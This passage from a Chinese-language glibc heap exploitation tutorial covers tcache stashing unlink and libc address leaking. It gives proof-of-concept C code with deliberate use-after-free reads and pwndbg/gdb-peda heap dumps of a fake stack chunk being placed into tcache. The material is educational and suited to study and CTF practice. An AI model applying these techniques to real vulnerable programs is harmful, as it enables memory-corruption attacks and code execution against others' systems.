fprintf(stderr, "Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

//malloc and return our fake chunk on stack
target = malloc(0x90);

fprintf(stderr, "As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
return 0;
}

这个 poc 用栈上的一个数组模拟 fake_chunk 。首先构造出 5 个 tcache chunk 和 2 个 smallbin chunk 的情况。模拟 UAF 漏洞修改 bin2->bk 为 fake_chunk ,在 calloc(1,0x90) 的时候触发攻击。

我们在 calloc 处下断点,调用前查看堆块排布情况。此时 tcache[0xa0] 中有 5 个空闲块。可以看到 chunk1->bk 已经被改为了 fake_chunk_addr 。而 fake_chunk->bk 也写上了一个可写地址。由于 smallbin 是按照 bk 指针寻块的,分配得到的顺序应当是 0x0000000000603250->0x0000000000603390->0x00007fffffffdbc0 (FIFO) 。调用 calloc 会返回给用户 0x0000000000603250+0x10

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
pwndbg> heapinfo
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x5555555598e0 (size : 0x20720)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x0
(0x0a0) smallbin[ 8]: 0x5555555593d0 (doubly linked list corruption 0x5555555593d0 != 0x0 and 0x5555555593d0 is broken)
(0xa0) tcache_entry[8](5): 0x555555559700 --> 0x555555559660 --> 0x5555555595c0 --> 0x555555559520 --> 0x555555559480

pwndbg> bins
tcachebins
0xa0 [ 5]: 0x555555559700 —▸ 0x555555559660 —▸ 0x5555555595c0 —▸ 0x555555559520 —▸ 0x555555559480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0xa0 [corrupted]
FD: 0x5555555593d0 —▸ 0x555555559290 —▸ 0x7ffff7fb0c70 (main_arena+240) ◂— 0x5555555593d0
BK: 0x555555559290 —▸ 0x5555555593d0 —▸ 0x7fffffffe400 —▸ 0x7fffffffe410 ◂— 0x0
largebins
empty

调用 calloc 后再查看堆块排布情况,可以看到 fake_chunk 已经被链入 tcache_entry[8] , 且因为分配顺序变成了 LIFO , 0x7fffffffdbd0-0x10 这个块被提到了链表头,下次 malloc(0x90) 即可获得这个块。

其 fd 指向下一个空闲块,在 unlink 过程中 bck->fd=bin 的赋值操作使得 0x00007fffffffdbd0+0x10 处写入了一个 libc 地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
pwndbg> heapinfo
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x5555555598e0 (size : 0x20720)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x0
(0x0a0) smallbin[ 8]: 0x5555555593d0 (doubly linked list corruption 0x5555555593d0 != 0x7 and 0x5555555593d0 is broken)
(0xa0) tcache_entry[8](7): 0x7fffffffe410 --> 0x5555555593e0 --> 0x555555559700 --> 0x555555559660 --> 0x5555555595c0 --> 0x555555559520 --> 0x555555559480

pwndbg> bins
tcachebins
0xa0 [ 7]: 0x7fffffffe410 —▸ 0x5555555593e0 —▸ 0x555555559700 —▸ 0x555555559660 —▸ 0x5555555595c0 —▸ 0x555555559520 —▸ 0x555555559480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0xa0 [corrupted]
FD: 0x5555555593d0 —▸ 0x555555559700 ◂— 0x0
BK: 0x7fffffffe410 ◂— 0x0
largebins
empty

libc leak

在以前的 libc 版本中,我们只需这样:

1
2
3
4
5
6
7
8
9
10
#include <stdlib.h>
#include <stdio.h>

/* libc leak on a pre-tcache glibc: free a large chunk and print the first
   word of its user data. */
int main()
{
    long *a = malloc(0x1000);
    /* Extra allocation placed after a, before it is freed. */
    malloc(0x10);
    free(a);
    /* Deliberate read-after-free; %p requires a void * argument, not a long. */
    printf("%p\n", (void *)a[0]);
}

但是在 2.26 之后的 libc 版本后,我们首先得先把 tcache 填满:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdlib.h>
#include <stdio.h>

/* libc leak with tcache enabled: fill the tcache bin for this size first so
   that the chunk freed afterwards goes to the unsorted bin. */
int main(int argc , char* argv[])
{
    long* t[7];
    long *a=malloc(0x100);
    long *b=malloc(0x10);

    // make tcache bin full
    for(int i=0;i<7;i++)
        t[i]=malloc(0x100);
    for(int i=0;i<7;i++)
        free(t[i]);

    free(a);
    // a is put in an unsorted bin because the tcache bin of this size is full
    /* Deliberate read-after-free; %p requires a void * argument, not a long. */
    printf("%p\n", (void *)a[0]);
}

之后,我们就可以 leak libc 了。因为tcache的最大大小为7,超过7个chunk,就会被放到unsorted bin中去。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
gdb-peda$ heapinfo
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x555555559af0 (size : 0x20510)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x555555559250 (size : 0x110)
(0x110) tcache_entry[15]: 0x5555555599f0 --> 0x5555555598e0 --> 0x5555555597d0 --> 0x5555555596c0 --> 0x5555555595b0 --> 0x5555555594a0 --> 0x555555559390
gdb-peda$ parseheap
addr prev size status fd bk
0x555555559000 0x0 0x250 Used None None
0x555555559250 0x0 0x110 Freed 0x7ffff7fc0ca0 0x7ffff7fc0ca0
0x555555559360 0x110 0x20 Used None None
0x555555559380 0x0 0x110 Used None None
0x555555559490 0x0 0x110 Used None None
0x5555555595a0 0x0 0x110 Used None None
0x5555555596b0 0x0 0x110 Used None None